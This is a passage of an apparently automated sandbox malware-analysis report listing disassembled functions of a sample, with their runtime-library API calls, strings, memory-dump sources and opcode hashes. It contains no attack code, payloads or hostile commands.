                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
                                                                                                        • API String ID: 2005118841-1331214609
                                                                                                        • Opcode ID: 277d6168d607a65d99ea736f8803da9a8f62dba7dcd04ae2872d5968a51f6768
                                                                                                        • Instruction ID: 6cae8b6969a7858af525cbc6b02cb814c5c74663d0247f72b1c4b449ed44eb7c
                                                                                                        • Opcode Fuzzy Hash: 277d6168d607a65d99ea736f8803da9a8f62dba7dcd04ae2872d5968a51f6768
                                                                                                        • Instruction Fuzzy Hash: E8017171940608EBCB04DB94CD41FDAB3FCEB09714F5085AAE421A73A0DB75AD048B50
                                                                                                        Function 00B157A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B157E5
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B157F3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                        • String ID: pScheduler
                                                                                                        • API String ID: 1687795959-923244539
                                                                                                        • Opcode ID: c943046126d89fc83dd1223cd39a36ef0048e3758dbdf1affa73738871971393
                                                                                                        • Instruction ID: 954636fd1634059eefea92031d282344c8fba55899ca18fef01abbea11743211
                                                                                                        • Opcode Fuzzy Hash: c943046126d89fc83dd1223cd39a36ef0048e3758dbdf1affa73738871971393
                                                                                                        • Instruction Fuzzy Hash: 9BF0A035A00704EBCB28FBA4D883CEE73E89E8470079441E9E612675E1DF60AE85C781
                                                                                                        Function 00B20064 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: NameName::
                                                                                                        • String ID: {flat}
                                                                                                        • API String ID: 1333004437-2606204563
                                                                                                        • Opcode ID: 44f45f01f0016189c9a1d20cde38a0d7eea8492690a381bb4f219f21deb378a0
                                                                                                        • Instruction ID: c7ffc8dcb932eb24052b58ce98748e77d4d3e84c404ea001ef0c7ee180b2807a
                                                                                                        • Opcode Fuzzy Hash: 44f45f01f0016189c9a1d20cde38a0d7eea8492690a381bb4f219f21deb378a0
                                                                                                        • Instruction Fuzzy Hash: 6CF03970150208DFE710EBA8E5A5FEA3BE0EB02715F0480C5E94C4F292CBB5E8C48BA0
                                                                                                        Function 00B12735 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B12754
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B12762
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                        • String ID: pThreadProxy
                                                                                                        • API String ID: 1687795959-3651400591
                                                                                                        • Opcode ID: b5a6636eecbdf28c98f41b72d8d6cb872de064223ed8f0e061acb30f15293303
                                                                                                        • Instruction ID: 773f6ac9252581160875b3916c9a24d0a66f972ac8851b606b6f8328bbdaa8b2
                                                                                                        • Opcode Fuzzy Hash: b5a6636eecbdf28c98f41b72d8d6cb872de064223ed8f0e061acb30f15293303
                                                                                                        • Instruction Fuzzy Hash: BBD05B31E003085ACB00F7B5D806EDD77EC9B00748F4040F4691196051EF70D914C764
                                                                                                        Function 00B18FA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00B18FB1
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B18FD8
                                                                                                          • Part of subcall function 00B17E0C: RaiseException.KERNEL32(?,?,00AE538C,?,?,Dflt,?,?,?,?,?,00AE538C,?,00B89978,?), ref: 00B17E6C
                                                                                                        Strings
                                                                                                        • Access violation - no RTTI data!, xrefs: 00B18FA8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                        • String ID: Access violation - no RTTI data!
                                                                                                        • API String ID: 2053020834-2158758863
                                                                                                        • Opcode ID: f63549269b1971608f2b85ac5cadf8350b8f7afd94cf6d25f2dc7807c5ead407
                                                                                                        • Instruction ID: a98a3955a8f3b1a40b77951b3e6e04df5d2a11b8c699795d61c047653dfa51f2
                                                                                                        • Opcode Fuzzy Hash: f63549269b1971608f2b85ac5cadf8350b8f7afd94cf6d25f2dc7807c5ead407
                                                                                                        • Instruction Fuzzy Hash: 63D0C96694420C5A8E18E6D09A478DE67E9EA08304FA008C2EB20A7460AF75BE994B61
                                                                                                        Function 00B21717 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00AABDFF,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,00000000,00000000,00AABDFF), ref: 00B217AD
                                                                                                        • GetLastError.KERNEL32(?,000000FF), ref: 00B217BB
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00AABDFF,00000000,?,000000FF), ref: 00B21816
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1717984340-0
                                                                                                        • Opcode ID: fee82ac4ed0d354be6078ad29d0b856412a31d33297ce856c2b0200e6a425b1c
                                                                                                        • Instruction ID: 5477f7cebbbcaef20cb67c3ebaaee473b00b6d80b324b6eaf10069b832ef7d33
                                                                                                        • Opcode Fuzzy Hash: fee82ac4ed0d354be6078ad29d0b856412a31d33297ce856c2b0200e6a425b1c
                                                                                                        • Instruction Fuzzy Hash: 9241DA34900265AFDB258F6CE884BBABBE5EF51360F1545E9E85D9B2A1DB308D01C7A0